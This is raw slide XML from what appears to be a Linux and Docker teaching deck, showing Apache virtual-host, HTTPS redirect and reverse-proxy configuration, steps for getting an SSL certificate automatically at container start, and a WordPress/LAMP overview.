                </a:solidFill>
              </a:rPr>
              <a:t>&lt;VirtualHost *:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        	ServerName </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DocumentRoot /var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/VirtualHost&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4623"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4624" name="Google Shape;4624;p750"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169950" y="91550"/>
            <a:ext cx="8520600" cy="477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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;VirtualHost *:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</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ServerName </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#DocumentRoot /var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="9E9E9E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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RewriteEngine on</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RewriteCond %{SERVER_NAME} =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</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RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [END,NE,R=permanent]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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&lt;/VirtualHost&gt;</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&lt;VirtualHost *:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FE6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</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ServerName </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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 Enable SSL</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SSLEngine on</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SSLCertificateFile /etc/letsencrypt/live/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/fullchain.pem</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SSLCertificateKeyFile /etc/letsencrypt/live/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/privkey.pem</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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 Proxy settings</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ProxyPreserveHost On</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ProxyPass / http://localhost:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</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    	ProxyPassReverse / http://localhost:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/VirtualHost&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 4628"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4629" name="Google Shape;4629;p751"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273350" y="149700"/>
            <a:ext cx="8743500" cy="8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700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatically get SSL when container start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4630" name="Google Shape;4630;p751"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529475" y="1100100"/>
            <a:ext cx="8335500" cy="38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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We have</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.env(environment)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONSTANT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constant_value</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FQDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entrypoint.sh</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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4" name="Shape 4634"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4635" name="Google Shape;4635;p752"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88950" y="202500"/>
            <a:ext cx="8743500" cy="8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Automatically get SSL when container start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4636" name="Google Shape;4636;p752"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496800" y="1222325"/>
            <a:ext cx="8335500" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Just create A Record in DNS Panel e.g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>app3</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build the image</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start the container</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:) Congratulation you got the SSL Certifcate</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://app4.domain.com</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4640"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4641" name="Google Shape;4641;p753"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240825" y="0"/>
            <a:ext cx="8743500" cy="8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Wordpress Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4642" name="Google Shape;4642;p753"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496950" y="950400"/>
            <a:ext cx="8335500" cy="38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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordpress is CMS (Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> System)</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developed using PHP language</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + apache + php =&gt; lamp stack</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LAMP = Linux Apache MySQL PHP</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84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97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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How to create a linux group?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Google Shape;532;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
